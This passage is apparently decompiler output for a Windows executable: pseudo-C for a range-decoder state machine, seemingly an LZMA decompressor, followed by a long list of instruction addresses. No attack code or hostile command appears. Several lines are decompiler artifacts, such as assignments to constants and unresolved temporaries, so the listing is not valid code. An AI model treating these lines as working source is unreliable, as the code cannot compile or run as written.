											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                            0x00000000
                                                                                            0x00407068
                                                                                            0x00407068
                                                                                            0x0040706c
                                                                                            0x00407095
                                                                                            0x0040709f
                                                                                            0x0040706e
                                                                                            0x00407077
                                                                                            0x00407084
                                                                                            0x00407087
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x004073ce
                                                                                            0x004073ce
                                                                                            0x004073ce
                                                                                            0x004073d4
                                                                                            0x004073da
                                                                                            0x004073e0
                                                                                            0x004073fa
                                                                                            0x004073fd
                                                                                            0x00407403
                                                                                            0x0040740e
                                                                                            0x00407410
                                                                                            0x004073e2
                                                                                            0x004073e2
                                                                                            0x004073f1
                                                                                            0x004073f5
                                                                                            0x004073f5
                                                                                            0x0040741a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040741c
                                                                                            0x00407420
                                                                                            0x004075cf
                                                                                            0x004075e5
                                                                                            0x004075ed
                                                                                            0x004075f4
                                                                                            0x004075f6
                                                                                            0x004075fd
                                                                                            0x00407601
                                                                                            0x00407601
                                                                                            0x0040742c
                                                                                            0x00407433
                                                                                            0x0040743b
                                                                                            0x0040743e
                                                                                            0x00407441
                                                                                            0x00407441
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406bec
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x00000000
                                                                                            0x00406bfd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c06
                                                                                            0x00406c09
                                                                                            0x00406c0c
                                                                                            0x00406c10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c16
                                                                                            0x00406c19
                                                                                            0x00406c1b
                                                                                            0x00406c1c
                                                                                            0x00406c1f
                                                                                            0x00406c21
                                                                                            0x00406c22
                                                                                            0x00406c24
                                                                                            0x00406c27
                                                                                            0x00406c2c
                                                                                            0x00406c31
                                                                                            0x00406c3a
                                                                                            0x00406c4d
                                                                                            0x00406c50
                                                                                            0x00406c5c
                                                                                            0x00406c84
                                                                                            0x00406c86
                                                                                            0x00406c94
                                                                                            0x00406c94
                                                                                            0x00406c98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c88
                                                                                            0x00406c8b
                                                                                            0x00406c8c
                                                                                            0x00406c8c
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c62
                                                                                            0x00406c67
                                                                                            0x00406c67
                                                                                            0x00406c70
                                                                                            0x00406c78
                                                                                            0x00406c7b
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c9e
                                                                                            0x00406c9e
                                                                                            0x00406ca2
                                                                                            0x0040754e
                                                                                            0x00000000
                                                                                            0x0040754e
                                                                                            0x00406cab
                                                                                            0x00406cbb
                                                                                            0x00406cbe
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc4
                                                                                            0x00406cc8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cca
                                                                                            0x00406cd0
                                                                                            0x00406cfa
                                                                                            0x00406d00
                                                                                            0x00406d07
                                                                                            0x00000000
                                                                                            0x00406d07
                                                                                            0x00406cd6
                                                                                            0x00406cd9
                                                                                            0x00406cde
                                                                                            0x00406cde
                                                                                            0x00406ce9
                                                                                            0x00406cf1
                                                                                            0x00406cf4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d39
                                                                                            0x00406d3f
                                                                                            0x00406d42
                                                                                            0x00406d4f
                                                                                            0x00406d57
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d0e
                                                                                            0x00406d0e
                                                                                            0x00406d12
                                                                                            0x0040755d
                                                                                            0x00000000
                                                                                            0x0040755d
                                                                                            0x00406d1e
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d2c
                                                                                            0x00406d2f
                                                                                            0x00406d32
                                                                                            0x00406d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004073ce
                                                                                            0x004073ce
                                                                                            0x004073d4
                                                                                            0x004073da
                                                                                            0x004073e0
                                                                                            0x004073fa
                                                                                            0x004073fd
                                                                                            0x00407403
                                                                                            0x0040740e
                                                                                            0x00407410
                                                                                            0x004073e2
                                                                                            0x004073e2
                                                                                            0x004073f1
                                                                                            0x004073f5
                                                                                            0x004073f5
                                                                                            0x0040741a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d5f
                                                                                            0x00406d61
                                                                                            0x00406d64
                                                                                            0x00406dd5
                                                                                            0x00406dd8
                                                                                            0x00406ddb
                                                                                            0x00406de2
                                                                                            0x00406dec
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00406d66
                                                                                            0x00406d6a
                                                                                            0x00406d6d
                                                                                            0x00406d6f
                                                                                            0x00406d72
                                                                                            0x00406d75
                                                                                            0x00406d77
                                                                                            0x00406d7a
                                                                                            0x00406d7c
                                                                                            0x00406d81
                                                                                            0x00406d84
                                                                                            0x00406d87
                                                                                            0x00406d8b
                                                                                            0x00406d92
                                                                                            0x00406d95
                                                                                            0x00406d9c
                                                                                            0x00406da0
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406dac
                                                                                            0x00406daf
                                                                                            0x00406dcd
                                                                                            0x00406dcf
                                                                                            0x00000000
                                                                                            0x00406db1
                                                                                            0x00406db1
                                                                                            0x00406db4
                                                                                            0x00406db7
                                                                                            0x00406dba
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbf
                                                                                            0x00406dc2
                                                                                            0x00406dc4
                                                                                            0x00406dc5
                                                                                            0x00406dc8
                                                                                            0x00000000
                                                                                            0x00406dc8
                                                                                            0x00000000
                                                                                            0x00406ffe
                                                                                            0x00407002
                                                                                            0x00407020
                                                                                            0x00407023
                                                                                            0x0040702a
                                                                                            0x0040702d
                                                                                            0x00407030
                                                                                            0x00407033
                                                                                            0x00407036
                                                                                            0x00407039
                                                                                            0x0040703b
                                                                                            0x00407042
                                                                                            0x00407043
                                                                                            0x00407045
                                                                                            0x00407048
                                                                                            0x0040704b
                                                                                            0x0040704e
                                                                                            0x0040704e
                                                                                            0x00407053
                                                                                            0x00000000
                                                                                            0x00407053
                                                                                            0x00407004
                                                                                            0x00407007
                                                                                            0x0040700a
                                                                                            0x00407014
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070ab
                                                                                            0x004070af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070b5
                                                                                            0x004070b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070bf
                                                                                            0x004070c1
                                                                                            0x004070c5
                                                                                            0x004070c5
                                                                                            0x004070c8
                                                                                            0x004070cc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040711c
                                                                                            0x00407120
                                                                                            0x00407127
                                                                                            0x0040712a
                                                                                            0x0040712d
                                                                                            0x00407137
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00407122
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407143
                                                                                            0x00407147
                                                                                            0x0040714e
                                                                                            0x00407151
                                                                                            0x00407154
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407157
                                                                                            0x0040715a
                                                                                            0x0040715d
                                                                                            0x0040715d
                                                                                            0x00407160
                                                                                            0x00407163
                                                                                            0x00407166
                                                                                            0x00407166
                                                                                            0x00407169
                                                                                            0x00407170
                                                                                            0x00407175
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407203
                                                                                            0x00407203
                                                                                            0x00407207
                                                                                            0x004075a5
                                                                                            0x00000000
                                                                                            0x004075a5
                                                                                            0x0040720d
                                                                                            0x00407210
                                                                                            0x00407213
                                                                                            0x00407217
                                                                                            0x0040721a
                                                                                            0x00407220
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407225
                                                                                            0x00407228
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406df8
                                                                                            0x00406df8
                                                                                            0x00406dfc
                                                                                            0x00407569
                                                                                            0x00000000
                                                                                            0x00407569
                                                                                            0x00406e02
                                                                                            0x00406e05
                                                                                            0x00406e08
                                                                                            0x00406e0c
                                                                                            0x00406e0f
                                                                                            0x00406e15
                                                                                            0x00406e17
